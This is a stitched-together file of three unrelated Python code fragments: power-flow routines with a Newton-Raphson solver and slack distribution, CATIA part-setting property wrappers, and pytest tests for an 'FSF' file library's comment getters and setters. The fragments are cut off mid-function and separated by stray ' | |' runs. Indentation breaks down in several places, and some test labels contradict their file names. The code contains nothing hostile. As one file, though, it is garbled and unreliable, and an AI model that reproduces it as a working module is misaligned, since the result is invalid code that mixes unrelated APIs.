        # Mirror each active-power column with its reactive counterpart.
        for component, attrs in to_allocate.items():
            if "p" in attrs:
                attrs.append("q")
            if "p0" in attrs and component != 'Link':
                attrs.extend(["q0", "q1"])
    allocate_series_dataframes(network, to_allocate)
def _calculate_controllable_nodal_power_balance(sub_network, network, snapshots, buses_o):
    """Dispatch controllable one-ports at their set-points and accumulate the
    signed nodal power balance into ``network.buses_t`` for both "p" and "q".

    For active power, the per-bus contributions of controllable branches
    (links) are subtracted afterwards.  Mutates ``c.pnl`` and
    ``network.buses_t`` in place; returns nothing.
    """
    for n in ("q", "p"):
        # allow all one ports to dispatch as set
        for c in sub_network.iterate_components(network.controllable_one_port_components):
            c_n_set = get_switchable_as_dense(network, c.name, n + '_set', snapshots, c.ind)
            c.pnl[n].loc[snapshots, c.ind] = c_n_set
        # set the power injection at each node from controllable components
        # (sign convention comes from each component's 'sign' attribute;
        # groupby(..., axis=1) sums columns that share a bus)
        network.buses_t[n].loc[snapshots, buses_o] = \
            sum([((c.pnl[n].loc[snapshots, c.ind] * c.df.loc[c.ind, 'sign'])
                  .groupby(c.df.loc[c.ind, 'bus'], axis=1).sum()
                  .reindex(columns=buses_o, fill_value=0.))
                 for c in sub_network.iterate_components(network.controllable_one_port_components)])
        if n == "p":
            # Controllable branches (links) withdraw p_i at each attached bus i;
            # subtract their per-bus totals from the active-power balance.
            network.buses_t[n].loc[snapshots, buses_o] += sum(
                [(- c.pnl[n+str(i)].loc[snapshots].groupby(c.df["bus"+str(i)], axis=1).sum()
                  .reindex(columns=buses_o, fill_value=0))
                 for c in network.iterate_components(network.controllable_branch_components)
                 for i in [int(col[3:]) for col in c.df.columns if col[:3] == "bus"]])
def _network_prepare_and_run_pf(network, snapshots, skip_pre, linear=False,
                                distribute_slack=False, slack_weights='p_set', **kwargs):
    """Shared driver for linear and non-linear power flow.

    Selects the per-sub-network solve/prepare functions, optionally runs the
    topology/dependent-value/allocation preliminaries, fixes link flows from
    their set-points, then solves every sub-network.  For the non-linear case
    a Dict with per-snapshot/per-sub-network 'n_iter', 'error' and
    'converged' DataFrames is returned; the linear case returns None.
    """
    if linear:
        sub_network_pf_fun = sub_network_lpf
        sub_network_prepare_fun = calculate_B_H
    else:
        sub_network_pf_fun = sub_network_pf
        sub_network_prepare_fun = calculate_Y
    if not skip_pre:
        network.determine_network_topology()
        calculate_dependent_values(network)
        _allocate_pf_outputs(network, linear)
    snapshots = _as_snapshots(network, snapshots)
    #deal with links: p0 is the set-point, p_i at every other bus follows
    # from p0 scaled by the (possibly time-varying) per-bus efficiency
    if not network.links.empty:
        p_set = get_switchable_as_dense(network, 'Link', 'p_set', snapshots)
        network.links_t.p0.loc[snapshots] = p_set.loc[snapshots]
        for i in [int(col[3:]) for col in network.links.columns if col[:3] == "bus" and col != "bus0"]:
            # bus1 uses the plain "efficiency" attribute; bus2, bus3, ... use
            # "efficiency2", "efficiency3", ...
            eff_name = "efficiency" if i == 1 else "efficiency{}".format(i)
            efficiency = get_switchable_as_dense(network, 'Link', eff_name, snapshots)
            links = network.links.index[network.links["bus{}".format(i)] != ""]
            network.links_t['p{}'.format(i)].loc[snapshots, links] = -network.links_t.p0.loc[snapshots, links]*efficiency.loc[snapshots, links]
    # Per-snapshot x per-sub-network convergence book-keeping (non-linear only).
    itdf = pd.DataFrame(index=snapshots, columns=network.sub_networks.index, dtype=int)
    difdf = pd.DataFrame(index=snapshots, columns=network.sub_networks.index)
    cnvdf = pd.DataFrame(index=snapshots, columns=network.sub_networks.index, dtype=bool)
    for sub_network in network.sub_networks.obj:
        if not skip_pre:
            find_bus_controls(sub_network)
            branches_i = sub_network.branches_i()
            if len(branches_i) > 0:
                sub_network_prepare_fun(sub_network, skip_pre=True)
        # A dict of slack weights is keyed by sub-network name; anything else
        # applies to every sub-network alike.
        if isinstance(slack_weights, dict):
            sn_slack_weights = slack_weights[sub_network.name]
        else:
            sn_slack_weights = slack_weights
        if isinstance(sn_slack_weights, dict):
            sn_slack_weights = pd.Series(sn_slack_weights)
        if not linear:
            # escape for single-bus sub-network
            if len(sub_network.buses()) <= 1:
                itdf[sub_network.name],\
                difdf[sub_network.name],\
                cnvdf[sub_network.name] = sub_network_pf_singlebus(sub_network, snapshots=snapshots, skip_pre=True,
                                                                   distribute_slack=distribute_slack,
                                                                   slack_weights=sn_slack_weights)
            else:
                itdf[sub_network.name],\
                difdf[sub_network.name],\
                cnvdf[sub_network.name] = sub_network_pf_fun(sub_network, snapshots=snapshots,
                                                             skip_pre=True, distribute_slack=distribute_slack,
                                                             slack_weights=sn_slack_weights, **kwargs)
        else:
            sub_network_pf_fun(sub_network, snapshots=snapshots, skip_pre=True, **kwargs)
    if not linear:
        return Dict({ 'n_iter': itdf, 'error': difdf, 'converged': cnvdf })
def network_pf(network, snapshots=None, skip_pre=False, x_tol=1e-6, use_seed=False,
               distribute_slack=False, slack_weights='p_set'):
    """Run the full non-linear power flow on every sub-network of *network*.

    Parameters
    ----------
    snapshots : list-like|single snapshot
        Subset (or a single element) of ``network.snapshots`` to solve;
        defaults to all of ``network.snapshots``.
    skip_pre : bool, default False
        Skip the preliminary steps of computing topology, calculating
        dependent values and finding bus controls.
    x_tol : float
        Tolerance for the Newton-Raphson power flow.
    use_seed : bool, default False
        Use a seed for the initial guess of the Newton-Raphson algorithm.
    distribute_slack : bool, default False
        If ``True``, share the slack power among generators (proportional to
        dispatch by default, or per ``slack_weights``); if ``False`` only
        the slack generator takes up the slack.
    slack_weights : dict|str, default 'p_set'
        How each sub-network's slack is shared: ``'p_set'`` (proportional to
        generator dispatch), ``'p_nom'``/``'p_nom_opt'`` (proportional to
        nominal/optimised capacity), or a dict keyed by sub-network index
        whose values are pandas.Series/dicts of weights indexed by that
        sub-network's buses or generators.  Bus-indexed weights are split
        over a bus's generators in proportion to ``p_nom`` if set,
        otherwise evenly.

    Returns
    -------
    dict
        Keys 'n_iter', 'converged' and 'error'; each value is a DataFrame
        over snapshots (rows) and sub-networks (columns).
    """
    return _network_prepare_and_run_pf(network, snapshots, skip_pre, linear=False,
                                       x_tol=x_tol, use_seed=use_seed,
                                       distribute_slack=distribute_slack,
                                       slack_weights=slack_weights)
def newton_raphson_sparse(f, guess, dfdx, x_tol=1e-10, lim_iter=100, distribute_slack=False, slack_weights=None):
    """Solve ``f(x) = 0`` by Newton-Raphson with a sparse Jacobian.

    Parameters
    ----------
    f : callable
        Residual; called as ``f(x, distribute_slack=..., slack_weights=...)``
        and returning a 1-D array.
    guess : numpy.ndarray
        Initial guess for x.
    dfdx : callable
        Same keyword signature as ``f``; returns the sparse Jacobian at x.
    x_tol : float
        Terminate once ``norm(f(x), inf)`` drops below this tolerance.
    lim_iter : int
        Maximum number of iterations.
    distribute_slack : bool
        Forwarded to ``f`` and ``dfdx``.
    slack_weights : pandas.Series|None
        Forwarded to ``f`` and ``dfdx``.

    Returns
    -------
    tuple
        ``(x, n_iter, diff, converged)`` — the final iterate, number of
        iterations performed, final infinity-norm error, and whether the
        tolerance was reached with a non-NaN error.
    """
    slack_args = {"distribute_slack": distribute_slack,
                  "slack_weights": slack_weights}
    converged = False
    n_iter = 0
    F = f(guess, **slack_args)
    # np.inf is the spelling that survives NumPy 2.0; the np.Inf alias was removed.
    diff = norm(F, np.inf)
    logger.debug("Error at iteration %d: %f", n_iter, diff)
    while diff > x_tol and n_iter < lim_iter:
        n_iter += 1
        guess = guess - spsolve(dfdx(guess, **slack_args), F)
        F = f(guess, **slack_args)
        diff = norm(F, np.inf)
        logger.debug("Error at iteration %d: %f", n_iter, diff)
    if diff > x_tol:
        logger.warning("Warning, we didn't reach the required tolerance within %d iterations, error is at %f. See the section \"Troubleshooting\" in the documentation for tips to fix this. ", n_iter, diff)
    elif not np.isnan(diff):
        # Below tolerance and the error is a real number: declare convergence.
        converged = True
    return guess, n_iter, diff, converged
def sub_network_pf_singlebus(sub_network, snapshots=None, skip_pre=False,
                             distribute_slack=False, slack_weights='p_set', linear=False):
    """
    Non-linear power flow for a sub-network consisting of a single bus.

    Parameters
    ----------
    snapshots : list-like|single snapshot
        A subset or an elements of network.snapshots on which to run
        the power flow, defaults to network.snapshots
    skip_pre: bool, default False
        Skip the preliminary steps of computing topology, calculating dependent values and finding bus controls.
    distribute_slack : bool, default False
        If ``True``, distribute the slack power across generators proportional to generator dispatch by default
        or according to the distribution scheme provided in ``slack_weights``.
        If ``False`` only the slack generator takes up the slack.
    slack_weights : pandas.Series|str, default 'p_set'
        Distribution scheme describing how to determine the fraction of the total slack power
        a bus of the subnetwork takes up. Default is to distribute proportional to generator dispatch
        ('p_set'). Another option is to distribute proportional to (optimised) nominal capacity ('p_nom' or 'p_nom_opt').
        Custom weights can be provided via a pandas.Series/dict
        that has the generators of the single bus as index/keys.

    Returns
    -------
    tuple
        ``(0, 0., True)`` — dummy substitute for the Newton-Raphson output
        (no iteration is needed on a single bus).
    """
    snapshots = _as_snapshots(sub_network.network, snapshots)
    network = sub_network.network
    logger.info("Balancing power on single-bus sub-network {} for snapshots {}".format(sub_network, snapshots))
    if not skip_pre:
        find_bus_controls(sub_network)
        _allocate_pf_outputs(network, linear=False)
    if isinstance(slack_weights, dict):
        slack_weights = pd.Series(slack_weights)
    buses_o = sub_network.buses_o
    _calculate_controllable_nodal_power_balance(sub_network, network, snapshots, buses_o)
    # The single (slack) bus holds its voltage set-point at zero angle.
    v_mag_pu_set = get_switchable_as_dense(network, 'Bus', 'v_mag_pu_set', snapshots)
    network.buses_t.v_mag_pu.loc[snapshots,sub_network.slack_bus] = v_mag_pu_set.loc[:,sub_network.slack_bus]
    network.buses_t.v_ang.loc[snapshots,sub_network.slack_bus] = 0.
    if distribute_slack:
        for bus, group in sub_network.generators().groupby('bus'):
            if slack_weights in ['p_nom', 'p_nom_opt']:
                # BUG FIX: the original `not all(series) == 0` parses as
                # `not (all(series) == 0)`, i.e. it demanded EVERY entry be
                # nonzero. The intended guard (matching the p_set checks
                # below) is that the attribute is not all-zero.
                assert not (network.generators[slack_weights] == 0).all(), "Invalid slack weights! Generator attribute {} is always zero.".format(slack_weights)
                bus_generator_shares = network.generators[slack_weights].loc[group.index].pipe(normed).fillna(0)
            elif slack_weights == 'p_set':
                generators_t_p_choice = get_switchable_as_dense(network, 'Generator', slack_weights, snapshots)
                assert not generators_t_p_choice.isna().all().all(), "Invalid slack weights! Generator attribute {} is always NaN.".format(slack_weights)
                assert not (generators_t_p_choice == 0).all().all(), "Invalid slack weights! Generator attribute {} is always zero.".format(slack_weights)
                bus_generator_shares = generators_t_p_choice.loc[snapshots,group.index].apply(normed, axis=1).fillna(0)
            else:
                # Custom pandas.Series of per-generator weights.
                bus_generator_shares = slack_weights.pipe(normed).fillna(0)
            # Each generator absorbs its share of the (negative) bus imbalance.
            network.generators_t.p.loc[snapshots,group.index] += bus_generator_shares.multiply(-network.buses_t.p.loc[snapshots,bus], axis=0)
    else:
        # All slack goes to the designated slack generator.
        network.generators_t.p.loc[snapshots,sub_network.slack_generator] -= network.buses_t.p.loc[snapshots,sub_network.slack_bus]
    network.generators_t.q.loc[snapshots,sub_network.slack_generator] -= network.buses_t.q.loc[snapshots,sub_network.slack_bus]
    network.buses_t.p.loc[snapshots,sub_network.slack_bus] = 0.
    network.buses_t.q.loc[snapshots,sub_network.slack_bus] = 0.
    return 0, 0., True # dummy substitute for newton raphson output
def sub_network_pf(sub_network, snapshots=None, skip_pre=False, x_tol=1e-6, use_seed=False,
distribute_slack=False, slack_weights='p_set'):
"""
Non-linear power flow for connected sub-network.
Parameters
----------
snapshots : list-like|single snapshot
A subset or an elements of network.snapshots on which to run
the power flow, defaults to network.snapshots
skip_pre: bool, default False
Skip the preliminary steps of computing topology, calculating dependent values and finding bus controls.
x_tol: float
Tolerance for Newton-Raphson power flow.
use_seed : bool, default False
Use a seed for the initial guess for the Newton-Raphson algorithm.
distribute_slack : bool, default False
If ``True``, distribute the slack power across generators proportional to | |
value: bool):
"""
:param bool value:
"""
self.part_infrastructure_setting_att.NewWith3DSupport = value
    @property
    def new_with_axis_system(self) -> bool:
        """
        Whether a new .CATPart document will be created with an axis system.

        Wraps the CAA ``NewWithAxisSystem`` setting (CAA V5 Visual Basic
        Help): TRUE/1 if an axis system is created, FALSE/0 otherwise.

        :return: bool
        :rtype: bool
        """
        return self.part_infrastructure_setting_att.NewWithAxisSystem

    @new_with_axis_system.setter
    def new_with_axis_system(self, value: bool):
        """
        Set the ``NewWithAxisSystem`` CAA setting.

        :param bool value: True to create an axis system in new .CATPart documents.
        """
        self.part_infrastructure_setting_att.NewWithAxisSystem = value
    @property
    def new_with_gs(self) -> bool:
        """
        Whether a new .CATPart document will be created with a Geometrical Set.

        Wraps the CAA ``NewWithGS`` setting (CAA V5 Visual Basic Help):
        TRUE/1 if a geometrical set is created, FALSE/0 otherwise.

        :return: bool
        :rtype: bool
        """
        return self.part_infrastructure_setting_att.NewWithGS

    @new_with_gs.setter
    def new_with_gs(self, value: bool):
        """
        Set the ``NewWithGS`` CAA setting.

        :param bool value: True to create a Geometrical Set in new .CATPart documents.
        """
        self.part_infrastructure_setting_att.NewWithGS = value
    @property
    def new_with_ogs(self) -> bool:
        """
        Whether a new .CATPart document will be created with an Ordered
        Geometrical Set.

        Wraps the CAA ``NewWithOGS`` setting (CAA V5 Visual Basic Help):
        TRUE/1 if an ordered geometrical set is created, FALSE/0 otherwise.

        :return: bool
        :rtype: bool
        """
        return self.part_infrastructure_setting_att.NewWithOGS

    @new_with_ogs.setter
    def new_with_ogs(self, value: bool):
        """
        Set the ``NewWithOGS`` CAA setting.

        :param bool value: True to create an Ordered Geometrical Set in new .CATPart documents.
        """
        self.part_infrastructure_setting_att.NewWithOGS = value
    @property
    def new_with_panel(self) -> bool:
        """
        Whether a dedicated 'New Part' panel is displayed when creating a new
        .CATPart document.

        Wraps the CAA ``NewWithPanel`` setting (CAA V5 Visual Basic Help):
        TRUE/1 if the 'New Part' panel is displayed, FALSE/0 otherwise.

        :return: bool
        :rtype: bool
        """
        return self.part_infrastructure_setting_att.NewWithPanel

    @new_with_panel.setter
    def new_with_panel(self, value: bool):
        """
        Set the ``NewWithPanel`` CAA setting.

        :param bool value: True to display the 'New Part' panel on document creation.
        """
        self.part_infrastructure_setting_att.NewWithPanel = value
    @property
    def only_current_operated_solid_set_in_geometry(self) -> bool:
        """
        Whether the 3D view shows only the current operated body's feature
        ("operated" meaning aggregated in a boolean operation), plus all
        other bodies and sets directly inserted under the Part feature.

        Wraps the CAA ``OnlyCurrentOperatedSolidSetInGeometry`` setting
        (CAA V5 Visual Basic Help): TRUE/1 if that restricted visualization
        is active, FALSE/0 otherwise.

        :return: bool
        :rtype: bool
        """
        return self.part_infrastructure_setting_att.OnlyCurrentOperatedSolidSetInGeometry

    @only_current_operated_solid_set_in_geometry.setter
    def only_current_operated_solid_set_in_geometry(self, value: bool):
        """
        Set the ``OnlyCurrentOperatedSolidSetInGeometry`` CAA setting.

        :param bool value: True to restrict 3D display to the current operated solid set.
        """
        self.part_infrastructure_setting_att.OnlyCurrentOperatedSolidSetInGeometry = value
    @property
    def only_current_solid_set_in_geometry(self) -> bool:
        """
        Whether the 3D view shows only the current solid set.

        Wraps the CAA ``OnlyCurrentSolidSetInGeometry`` setting.

        NOTE(review): the upstream CAA help text for this property was a
        verbatim copy of ``OnlyCurrentOperatedSolidSetInGeometry`` ("current
        operated body"); presumably this variant restricts display to the
        current (non-operated) solid set — confirm against the CAA
        documentation.

        :return: bool
        :rtype: bool
        """
        return self.part_infrastructure_setting_att.OnlyCurrentSolidSetInGeometry

    @only_current_solid_set_in_geometry.setter
    def only_current_solid_set_in_geometry(self, value: bool):
        """
        Set the ``OnlyCurrentSolidSetInGeometry`` CAA setting.

        :param bool value: True to restrict 3D display to the current solid set.
        """
        self.part_infrastructure_setting_att.OnlyCurrentSolidSetInGeometry = value
    @property
    def parameters_node_in_tree(self) -> bool:
        """
        Whether a "Parameters" node is created in the specification tree to
        contain all Knowledgeware parameters.  Per the CAA help, the value
        can be changed after parameters exist; only the tree display status
        is affected.

        Wraps the CAA ``ParametersNodeInTree`` setting (CAA V5 Visual Basic
        Help): TRUE/1 if such a node is displayed, FALSE/0 otherwise.

        :return: bool
        :rtype: bool
        """
        return self.part_infrastructure_setting_att.ParametersNodeInTree

    @parameters_node_in_tree.setter
    def parameters_node_in_tree(self, value: bool):
        """
        Set the ``ParametersNodeInTree`` CAA setting.

        :param bool value: True to display the "Parameters" tree node.
        """
        self.part_infrastructure_setting_att.ParametersNodeInTree = value
    @property
    def publish_topological_elements(self) -> bool:
        """
        Whether topological elements (faces, edges, vertices, axis
        extremities) can be published.

        Wraps the CAA ``PublishTopologicalElements`` setting (CAA V5 Visual
        Basic Help): TRUE/1 if topological elements can be used for
        publication, FALSE/0 otherwise.

        :return: bool
        :rtype: bool
        """
        return self.part_infrastructure_setting_att.PublishTopologicalElements

    @publish_topological_elements.setter
    def publish_topological_elements(self, value: bool):
        """
        Set the ``PublishTopologicalElements`` CAA setting.

        :param bool value: True to allow publication of topological elements.
        """
        self.part_infrastructure_setting_att.PublishTopologicalElements = value
    @property
    def relations_node_in_tree(self) -> bool:
        """
        Whether a "Relations" node is created in the specification tree to
        contain all Knowledgeware relations (for instance formulas).  Per
        the CAA help, the value can be changed after relations exist; only
        the tree display status is affected.

        Wraps the CAA ``RelationsNodeInTree`` setting (CAA V5 Visual Basic
        Help): TRUE/1 if such a node is displayed, FALSE/0 otherwise.

        :return: bool
        :rtype: bool
        """
        return self.part_infrastructure_setting_att.RelationsNodeInTree

    @relations_node_in_tree.setter
    def relations_node_in_tree(self, value: bool):
        """
        Set the ``RelationsNodeInTree`` CAA setting.

        :param bool value: True to display the "Relations" tree node.
        """
        self.part_infrastructure_setting_att.RelationsNodeInTree = value
    @property
    def replace_only_after_current(self) -> bool:
        """
        Whether the replace operation can only apply to components located
        after the current object.

        Wraps the CAA ``ReplaceOnlyAfterCurrent`` setting (CAA V5 Visual
        Basic Help): TRUE/1 if replace is restricted to components after the
        current object, FALSE/0 otherwise.

        :return: bool
        :rtype: bool
        """
        return self.part_infrastructure_setting_att.ReplaceOnlyAfterCurrent
@replace_only_after_current.setter
def replace_only_after_current(self, value: | |
fsf_data = cmdopt_raw_data
assert (fsf_data.fileHeader is not None)
# Set file header
status = fsf_write.SetFileHeader(fsf_data.fileHeader)
check_status("fsf_write.SetFileHeader", status)
assert (status == fsf.Status.SUCCESS)
# Set stream info
for streamIdx in range(fsf_data.fileHeader.nStreams):
status = fsf_write.SetStreamInfo(streamIdx, fsf_data.streamInfo[streamIdx])
assert (status == fsf.Status.SUCCESS)
check_status("fsf_write.SetStreamInfo: " + str(fsf_data.fileHeader.nStreams) + " streams.", status)
# Write optional file header
status = fsf_write.SetOptionalFileHeader(fsf_data.optFileHeader)
check_status("fsf_write.SetOptionalFileHeader", status)
assert (status == fsf.Status.SUCCESS)
# Write file comment
status = fsf_write.SetFileComment(fsf_data.fileComment)
check_status("fsf_write.SetFileComment", status)
assert (status == fsf.Status.SUCCESS)
    def test_fsf_010_01(self, cmdopt_write_dir, cmdopt_raw_data):
        """
        Exercise FSF 'SetFileComment' API.

        Instantiate FSF using write utility and call CreateFsfFile with valid FSF file name.
        SetFileComment using previously instantiated fileComment with invalid values
        (size greater than the FileCommentSize declared in the file header):
        SetFileComment must return Status.FAILED.
        """
        print("\n===================================================="
              "\nTestFSFSetFileComment (test_fsf_010_01) : "
              "\nInstantiate FSF using write utility and call CreateFsfFile with valid FSF file name. "
              "SetFileComment using previously instantiated fileComment with invalid values. "
              "(size greater than the FileCommentSize) ")

        # Instantiate FSF Write utility
        fsf_write = fsf.FSF_Common(fsf.Mode.WRITE)

        # Set FSF filename
        file_name = "\\test_fsf_010_01.fsf"
        write_file = cmdopt_write_dir + file_name

        # Create FSF file for writing
        status = fsf_write.CreateFsfFile(write_file)
        check_status("fsf_write.CreateFsfFile", status)
        assert (status == fsf.Status.SUCCESS)

        # Get data to use
        fsf_data = cmdopt_raw_data
        assert (fsf_data.fileHeader is not None)

        # Set file header (declares the expected FileCommentSize)
        status = fsf_write.SetFileHeader(fsf_data.fileHeader)
        check_status("fsf_write.SetFileHeader", status)
        assert (status == fsf.Status.SUCCESS)

        # Set stream info
        for streamIdx in range(fsf_data.fileHeader.nStreams):
            status = fsf_write.SetStreamInfo(streamIdx, fsf_data.streamInfo[streamIdx])
            assert (status == fsf.Status.SUCCESS)
        check_status("fsf_write.SetStreamInfo: " + str(fsf_data.fileHeader.nStreams) + " streams.", status)

        # Write optional file header
        status = fsf_write.SetOptionalFileHeader(fsf_data.optFileHeader)
        check_status("fsf_write.SetOptionalFileHeader", status)
        assert (status == fsf.Status.SUCCESS)

        # Write file comment: padding the original comment makes it longer than
        # the declared FileCommentSize, so SetFileComment must reject it.
        new_file_comment = fsf.FileComment()
        new_file_comment.string = fsf_data.fileComment.string + "random string"
        print(fsf_data.fileComment.string)
        status = fsf_write.SetFileComment(new_file_comment)
        check_status("fsf_write.SetFileComment", status)
        assert (status == fsf.Status.FAILED)
    def test_fsf_010_02(self, cmdopt_write_dir, cmdopt_raw_data):
        """
        Exercise FSF 'SetFileComment' API.

        Instantiate FSF using write utility and call CreateFsfFile with valid FSF file name.
        SetFileComment using previously instantiated fileComment with invalid values
        (actual comment size less than the FileCommentSize declared in the header):
        SetFileComment must return Status.FAILED.
        """
        print("\n===================================================="
              "\nTestFSFSetFileComment (test_fsf_010_02) : "
              "\nInstantiate FSF using write utility and call CreateFsfFile with valid FSF file name. "
              "SetFileComment using previously instantiated fileComment with invalid values. "
              "(size less than the FileCommentSize)")

        # Instantiate FSF Write utility
        fsf_write = fsf.FSF_Common(fsf.Mode.WRITE)

        # Set FSF filename
        file_name = "\\test_fsf_010_02.fsf"
        write_file = cmdopt_write_dir + file_name

        # Create FSF file for writing
        status = fsf_write.CreateFsfFile(write_file)
        check_status("fsf_write.CreateFsfFile", status)
        assert (status == fsf.Status.SUCCESS)

        # Get data to use
        fsf_data = cmdopt_raw_data
        assert (fsf_data.fileHeader is not None)

        # Set file header with FileCommentSize forced to 100 (larger than the
        # actual comment), then restore the original value on the shared
        # fixture so later tests are unaffected.
        file_comment_size = fsf_data.fileHeader.FileCommentSize
        fsf_data.fileHeader.FileCommentSize = 100
        status = fsf_write.SetFileHeader(fsf_data.fileHeader)
        check_status("fsf_write.SetFileHeader", status)
        assert (status == fsf.Status.SUCCESS)
        fsf_data.fileHeader.FileCommentSize = file_comment_size

        # Set stream info
        for streamIdx in range(fsf_data.fileHeader.nStreams):
            status = fsf_write.SetStreamInfo(streamIdx, fsf_data.streamInfo[streamIdx])
            assert (status == fsf.Status.SUCCESS)
        check_status("fsf_write.SetStreamInfo: " + str(fsf_data.fileHeader.nStreams) + " streams.", status)

        # Write optional file header
        status = fsf_write.SetOptionalFileHeader(fsf_data.optFileHeader)
        check_status("fsf_write.SetOptionalFileHeader", status)
        assert (status == fsf.Status.SUCCESS)

        # Write file comment: shorter than the declared size, so it must fail.
        status = fsf_write.SetFileComment(fsf_data.fileComment)
        check_status("fsf_write.SetFileComment", status)
        assert (status == fsf.Status.FAILED)
    def test_fsf_010_03(self, cmdopt_read_dir, cmdopt_raw_data):
        """
        Exercise FSF 'SetFileComment' API.

        Instantiate FSF using read utility and call OpenFile.
        SetFileComment (and the other setters) using previously instantiated
        data with valid values: every setter must return
        Status.INVALID_OPERATION on a read-mode handle.
        """
        print("\n===================================================="
              "\nTestFSFSetFileComment (test_fsf_010_03) : "
              "\nInstantiate FSF using read utility and call OpenFile. "
              "SetFileComment using previously instantiated fileComment with valid values.")

        # Instantiate FSF Read utility (setters are invalid in this mode)
        fsf_read = fsf.FSF_Common(fsf.Mode.READ)

        # Create dummy read file
        file_name = "\\test_fsf_010_03.fsf"
        status = create_dummy_read_file(cmdopt_read_dir, file_name)
        assert status is True

        # Set FSF filename
        read_file = cmdopt_read_dir + file_name

        # Open FSF file for reading
        status = fsf_read.OpenFile(read_file)
        check_status("fsf_read.OpenFile", status)
        assert (status == fsf.Status.SUCCESS)

        # Get data to use
        fsf_data = cmdopt_raw_data
        assert (fsf_data.fileHeader is not None)

        # Set file header — rejected on a read-mode handle
        status = fsf_read.SetFileHeader(fsf_data.fileHeader)
        check_status("fsf_write.SetFileHeader", status)
        assert (status == fsf.Status.INVALID_OPERATION)

        # Set stream info — rejected on a read-mode handle
        for streamIdx in range(fsf_data.fileHeader.nStreams):
            status = fsf_read.SetStreamInfo(streamIdx, fsf_data.streamInfo[streamIdx])
            assert (status == fsf.Status.INVALID_OPERATION)
        check_status("fsf_write.SetStreamInfo: " + str(fsf_data.fileHeader.nStreams) + " streams.", status)

        # Write optional file header — rejected on a read-mode handle
        status = fsf_read.SetOptionalFileHeader(fsf_data.optFileHeader)
        check_status("fsf_write.SetOptionalFileHeader", status)
        assert (status == fsf.Status.INVALID_OPERATION)

        # Write file comment — rejected on a read-mode handle
        status = fsf_read.SetFileComment(fsf_data.fileComment)
        check_status("fsf_write.SetFileComment", status)
        assert (status == fsf.Status.INVALID_OPERATION)
def test_fsf_010_04(self, cmdopt_write_dir, cmdopt_raw_data):
"""
Exercise FSF 'SetFileComment' API
Instantiate FSF using write utility and call CreateFsfFile with valid FSF file name.
WITHOUT setting the fileHeader, do SetFileComment using previously instantiated fileComment with values.
"""
print("\n===================================================="
"\nTestFSFSetFileComment (test_fsf_010_00) : "
"\nInstantiate FSF using write utility and call CreateFsfFile with valid FSF file name. "
"WITHOUT setting the fileHeader, do SetFileComment using previously instantiated "
"fileComment with values. ")
# Instantiate FSF Write utility
fsf_write = fsf.FSF_Common(fsf.Mode.WRITE)
# Set FSF filename
file_name = "\\test_fsf_010_04.fsf"
write_file = cmdopt_write_dir + file_name
# Create FSF file for writing
status = fsf_write.CreateFsfFile(write_file)
check_status("fsf_write.CreateFsfFile", status)
assert (status == fsf.Status.SUCCESS)
# Get data to use
fsf_data = cmdopt_raw_data
assert (fsf_data.fileHeader is not None)
# Set stream info
for streamIdx in range(fsf_data.fileHeader.nStreams):
status = fsf_write.SetStreamInfo(streamIdx, fsf_data.streamInfo[streamIdx])
assert (status == fsf.Status.FILE_HEADER_ERROR)
check_status("fsf_write.SetStreamInfo: " + str(fsf_data.fileHeader.nStreams) + " streams.", status)
# Write optional file header
status = fsf_write.SetOptionalFileHeader(fsf_data.optFileHeader)
check_status("fsf_write.SetOptionalFileHeader", status)
assert (status == fsf.Status.FILE_HEADER_ERROR)
# Write file comment
status = fsf_write.SetFileComment(fsf_data.fileComment)
check_status("fsf_write.SetFileComment", status)
assert (status == fsf.Status.FILE_HEADER_ERROR)
##############################
#
# FSF parser GetFileComment API test
#
class TestFSFGetFileComment:
@pytest.mark.smoke
def test_fsf_011_00(self, cmdopt_read_dir):
"""
Exercise FSF 'GetFileComment' API
Instantiate FSF using read utility and call OpenFile with valid FSF file name.
GetFileComment from an FSF file with complete data.
"""
print("\n===================================================="
"\nTestFSFGetFileComment (test_fsf_011_00) : "
"\nInstantiate FSF using read utility and call OpenFile with valid FSF file name. "
"GetFileComment from an FSF file with complete data. ")
# Instantiate FSF Write utility
fsf_read = fsf.FSF_Common(fsf.Mode.READ)
# Set FSF filename
read_file = cmdopt_read_dir + readDataFileName
# Open FSF file for writing
status = fsf_read.OpenFile(read_file)
check_status("fsf_read.OpenFile", status)
assert (status == fsf.Status.SUCCESS)
# Instantiate fsf
fsf_data = FsfData()
# Read file header
status = fsf_read.GetFileHeader(fsf_data.fileHeader)
check_status("fsf_read.GetFileHeader", status)
assert (status == fsf.Status.SUCCESS)
assert (fsf_data.fileHeader is not None)
# Read stream info
fsf_data.streamInfo = [fsf.StreamInfo()] * fsf_data.fileHeader.nStreams
for streamIdx in range(fsf_data.fileHeader.nStreams):
status = fsf_read.GetStreamInfo(streamIdx, fsf_data.streamInfo[streamIdx])
assert (status == fsf.Status.SUCCESS)
check_status("fsf_read.GetStreamInfo: " + str(fsf_data.fileHeader.nStreams) + "streams.", status)
# Read and write optional file header
status = fsf_read.GetOptionalFileHeader(fsf_data.optFileHeader)
check_status("fsf_read.GetOptionalFileHeader", status)
assert (status == fsf.Status.SUCCESS)
# Read and write file comment
status = fsf_read.GetFileComment(fsf_data.fileComment)
check_status("fsf_read.GetFileComment", status)
assert (status == fsf.Status.SUCCESS)
def test_fsf_011_01(self, cmdopt_write_dir, cmdopt_raw_data):
"""
Exercise FSF 'GetFileComment' API
Instantiate FSF using write utility and call CreateFsfFile with valid FSF file name.
GetFileComment from FSF file with incomplete data.
"""
print("\n===================================================="
"\nTestFSFGetFileComment (test_fsf_011_01) : "
"\nInstantiate FSF using write utility and call CreateFsfFile with valid FSF file name."
"GetFileComment from FSF file with complete data. ")
# Instantiate FSF Write utility
fsf_write = fsf.FSF_Common(fsf.Mode.WRITE)
# Set FSF filename
file_name = "\\test_fsf_009_01.fsf"
write_file = cmdopt_write_dir + file_name
# Create FSF file for writing
status = fsf_write.CreateFsfFile(write_file)
check_status("fsf_write.CreateFsfFile", status)
assert (status == fsf.Status.SUCCESS)
# Get data to use
fsf_data = FsfData()
assert (fsf_data.fileHeader is not None)
# Read and write optional file header
status = fsf_write.GetOptionalFileHeader(fsf_data.optFileHeader)
check_status("fsf_read.GetOptionalFileHeader", status)
assert (status == fsf.Status.INVALID_OPERATION)
# Read and write file comment
status = fsf_write.GetFileComment(fsf_data.fileComment)
check_status("fsf_read.GetFileComment", status)
assert (status == fsf.Status.INVALID_OPERATION)
def test_fsf_011_02(self, cmdopt_read_dir):
"""
Exercise FSF 'GetFileComment' API
Instantiate FSF using read utility and call OpenFile with valid FSF file name.
GetFileComment from FSF file after forced FileCommentSize as 0.
"""
print("\n===================================================="
